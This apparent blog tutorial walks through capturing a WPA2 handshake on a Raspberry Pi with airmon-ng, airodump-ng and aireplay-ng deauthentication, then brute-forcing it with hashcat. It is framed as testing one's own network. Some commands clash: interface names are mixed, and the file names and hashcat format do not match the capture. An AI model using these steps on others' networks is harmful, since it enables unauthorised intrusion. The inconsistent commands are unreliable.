WiFi technology is used almost in every home and business. This is understandable, given how convenient internet connectivity becomes with WiFi. This convenience comes with a price, and that price is privacy. Since WiFi is wireless this means anyone within range of the router can eavesdrop on your connection and gain access to your network.
In this article, I want to teach you how to test your own network to see how easy it is to gain access to it.
In order to be able to perform this task, we need some SW and HW tools.
Raspberry Pi 3/4 running Raspberry OS
WiFi adaptor with monitor mode capabilities
Caputring a WPA/WPA2 Handshake
The handshake is a process in which the device and the router exchange keys that are used to encrypt the data and secure the connection.
We will make use of a penetration testing tool call Aircarck-ng.
Install Aircarck-ng on your Pi
sudo apt-get update sudo apt-get upgrade sudo apt-get install aircrack-ng
Discover network interface on your system
A list of the Wireless interfaces will show up
PHY Interface Driver Chipset phy0 wlan0 brcmfmac Broadcom 43430 phy1 wlan1 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
In this example, we can see two wireless interfaces. wlan0 using Chipset by Broadcom and wlan1 using a chipset by Qualcomm.
We will use wlan1, since it has monitor mode capabilities.
To start monitor mode on wlan1 run the following command:
sudo airmon-ng start wlan1
A virtual network device will be created, you can see the active interfaces with the following command
now we can monitor the surrounding for WiFi networks with the following command:
sudo airodump-ng wlan1mon --write SSID.txt
Select a network you wish to capture packets from. take the bssid and channel from the SSID.txt file.
sudo airodump-ng wlan0mon --output-format pcap --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01
Now we will capture the WPA2-PSK Handshake by sending a re-authentication request.
On a separate terminal run the command to send 5 re-authentication requests
sudo aireplay-ng -0 5 -a F0:9F:C0:AA:6C:B8 wlan1mon
now you can stop the capturing and the re-authentication requests
check if the handshake was captured
sudo aircrack-ng test01.cap
Now that you have the .cap file. you need to copy it to a machine that is capable of running hashcat to start cracking it.
We will use Hashcat to crack the password. Hashcat is an open source software used for password recovery.
To install Hashcat on windows, download the binaries from Hashcat website.
To install Hashcat on Linux run the following command
sudo apt-get install hashcat
or download the binaries
To start the password recover run:
hashcat.exe -m 22000 -a 3 capture.hccapx ?d?d?d?d?d?d?d?d